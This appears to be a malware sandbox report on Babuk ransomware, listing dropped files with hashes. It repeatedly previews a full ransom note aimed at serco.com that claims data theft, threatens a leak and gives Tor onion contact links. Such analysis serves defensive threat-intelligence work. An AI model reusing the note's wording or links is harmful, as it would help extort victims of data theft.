                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\Gadgets\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\settings.ini.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):248
                                                                            Entropy (8bit):7.017591750004474
                                                                            Encrypted:false
                                                                            SSDEEP:3:4zrHAvSBUs2sgGqrVsH7uxy7Lj1DTWedRcOyMr/vgcV4rfyoepQdxx7hf7oTXBe3:arHAvRsZgDsbNDvJZSCyNlcXoo0vtn
                                                                            MD5:456DB013688DEB55A540B6E70360B37C
                                                                            SHA1:43E722B7CD6CFEFF35B60A9FC585C0E5E0FE9C43
                                                                            SHA-256:2255421235FEB6B42337EBD750F4A108DA1F3B2A287E7EF511287E39CA899B14
                                                                            SHA-512:799FAA52EB2FDFFDC1F69EF0DC7AAC13C30B04A1C2B03486FE1C27FD31F608178019FA76FF8FF3C52A61F2465C59FEE8DBB92991BE6545CC3431C22C99F09EEB
                                                                            Malicious:false
                                                                            Preview: {....zCt..y..L....(.[....g.._..'...h.....dl+O.Nm.m....@^.N...W.....h~9...g..T......S..w....~.WB....>...2..#.YG..DS.iN..................:..%%.......0d!...z.0LY.z...t.."..^.J..n.Ru....=.;...;.]...P...*......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\WindowsApps\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\WindowsApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.6062750867769235
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlQIGDsyj7KmlcjIzNBfpKPqjb0V7v0Glpgp0ERpWCK5v/c9UxNvEEn:gIGwyj7K0SIDf7jbs7vpA0ER4CK5v/0I
                                                                            MD5:52B00846C82CFC76ADE8A663479E47D4
                                                                            SHA1:E331AEB178FBB02BB0974B30283CBA729A8B0083
                                                                            SHA-256:1D63E35311DE937770477FCD7EF4EA9FA65FA2550B4F437067C73E8975890DD6
                                                                            SHA-512:EC4E89ED8762DB6D761CF4B6D394F8122306FD7514E060455B3ECC1D680DD5826C1FB2D5C137E3B0CC019CCF3AE8D4CE158610E475D024763FEDAE3B7AF03C34
                                                                            Malicious:false
                                                                            Preview: .....0.p.'kv.c....,.s.,......J{JN...y......!Q..{{......../.YA......X.(p..."i&)#m...n{....G..[z...Z.1W.:........'...P..._....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.542257899264044
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlend/40FxD7H8MqKaHnZAzJiDW4fPLogKxqZjsccg0UxNvEEn:2waxnH8emZnDW43LogGyjscp00vtn
                                                                            MD5:8BDDD3AF755FD5B0040BFCB72C98BC58
                                                                            SHA1:ED382E33FD440A1582C85716ADF3900116862912
                                                                            SHA-256:E796CACFAB300A769E310E69838D0F14C0083DFFFC02C6FE5120121EEBC95425
                                                                            SHA-512:A74D7FAA61093179F45647A54D99691941109244EE1FB687167DDD53A1338962643CA532D889D7E7F5B69F05FA1AD9B409C8801EF7418ABE9334129BE9AFF9E3
                                                                            Malicious:false
                                                                            Preview: .....A.P..e..Vx...._..Z..u\.TT.9\.b...$...........bB.^./.#......,.....3T..Y1....D.....'tfl..IV.....~.....O..W...m.I6.[.7.&..A.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\ESE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\ESE\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.624843036055279
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlRVo7GRoLenGIbezmJ2KQRv6uCM7C8toEl1A53VUxNvEEn:hhRW4HNJYCuCKlO53V0vtn
                                                                            MD5:7CFB678F9CBDDE3264C858BE3BE078DC
                                                                            SHA1:960D51C1BD7D43C0551FE355FF506D1C7AD4BDC4
                                                                            SHA-256:93F69A99B142C88DB88C033CE157AF96F528D955C5B70C0E9F63058B3F76FAF2
                                                                            SHA-512:1AB616FDCD57F1E0C01AD112E5C19754FAB23074B50916D9616D614B4F8706B30C564A872C43B3F25573FCDAA1F02D17F3F2C9139A14C143151491575AE620ED
                                                                            Malicious:false
                                                                            Preview: ....i. =..p3.[......L..@.k..{...|J.,r.~...s.e........1.......UE...'.L]!.4.b...S.....5R...._L...9..Y..].m|%L...`..T...m.K1..a....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.520867256148369
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlxFD/8wLqDUQZ8X5CMQ1Dkwuo7yGqR/ccaN1Aa6J/5bB4SxTmL9ywNLUxNvEEn:HLWDUQZQvQ1DxrcG1X67jVXwNL0vtn
                                                                            MD5:4FDA75370CAA8DD980A6B8DC90A34CCD
                                                                            SHA1:7F8290807FA581ABFDE85636240C42E969EB9AA3
                                                                            SHA-256:9DDCFEBAA419FCD8AEA88ADA2D3223F06DCDF47E6E5253CFBA6C5EF861278102
                                                                            SHA-512:1CAC87958544598BF4B62D957B8A8CEEBC86E1E673A722D1CCE07EC08757BB1010C0B198CC95E005EDB591F5E82EC68F95A977C79ADBA3A49013A666FE9A89BD
                                                                            Malicious:false
                                                                            Preview: ......}.&Z......D...f.<h.k]...%.n......|.......Sf+n..U.M....OW....y...:..&.%}*..|.<...0..3.vp...z.]F...5.+1.L%._...7X.rN5l........choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):259
                                                                            Entropy (8bit):7.0264585408827385
                                                                            Encrypted:false
                                                                            SSDEEP:6:j0a1Uu8kjqnXaJlMpCwhwDUuRlapXAFhf9uyiYLbH7EwHtL0vtn:n1P84vJWpb2DUpMZHK
                                                                            MD5:9C37DF8386295B63956C30C671A66D46
                                                                            SHA1:A63FD09DE54CD3D91A50A423D3B30A9AAC45A2B2
                                                                            SHA-256:536F669B24ECA1C7BA4E351DC6AE475964BBAD1339AD932CF31F39780FC62717
                                                                            SHA-512:CE49F86D214C88A1115F8341D7D508209CC0034CB288AFEA60AB3BF03CA15F13E9C72561267FEF838DD9B7A8A4B725D4E1689DB73B83775E96332DD803E42DB0
                                                                            Malicious:false
                                                                            Preview: =)P...l(...\... .+.3x.U...;..1.w$'B.._Ek...n ,$.|..:.L......%.V.....y'.v...t..F..30.!......?..B.AAs....8......a.3..K..r......j^j....Q_.x..jQHN.@2.&.5..@..0.#U`..T&A.Q..g.C...N...'=E1c.5=.l.=[$.7..qo:.N.....z.K.n.#~....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\input\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
